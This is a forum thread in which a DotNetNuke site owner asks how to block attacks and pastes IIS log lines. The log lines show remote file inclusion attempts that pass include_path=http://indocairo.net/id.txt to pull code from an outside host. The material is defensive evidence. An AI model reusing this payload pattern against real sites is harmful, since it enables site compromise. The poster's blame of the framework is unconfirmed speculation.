Hey there,

I was wondering if it was possible to be able to prevent users from accessing the site with "Include_Path" stuck in the HTTP request?

I am getting attack after attack from someone trying to destroy my site for the 3rd time!

2008-09-01 05:50:17 W3SVC2090340771 BODUK3782 92.48.116.59 GET /index.htm include_path=http://indocairo.net/id.txt?? 80 - 216.246.28.43 HTTP/1.1 libwww-perl/5.810 - - www.djabstraction.com 200 0 0 417 169 203
2008-09-01 05:50:22 W3SVC2090340771 BODUK3782 92.48.116.59 GET /dnn/Guestbook/tabid/ include_path=http://indocairo.net/id.txt?? 80 - 216.246.28.43 HTTP/1.1 libwww-perl/5.810 - - www.djabstraction.com 200 0 3 21536 189 3796

Just a couple of the lines in question.  And I've got thousands of them, all for different script paths, from different clients etc.  I don't have the guestbook or forum enabled but have locked the site out anyway until I can proceed with confidence!

Any ideas??

Hi,

This is a PHP attack, no? What does it do in .NET?

Peter

Doesn't that look like if the PHP binaries are installed on IIS, IIS will parse the posted URL and process whatever is in the files?

So you are telling me you can't inject a PHP attack into a .NET application?

Edit:  You might want to consider someone injecting scripts into forum posts etc, user input on a site is always one of the weakest points.

Hi Sanjay,

I'm not sure I understand, maybe you could reiterate on that one a little?  I am merely presuing the cause of why my website was hacked and I lost absolutely everything, this has happened twice with DotNetNuke and *never* when I have used a basic website created by myself using HTML / PHP / ASP so I can quite confidently say it's a security hole in the DNN framework.
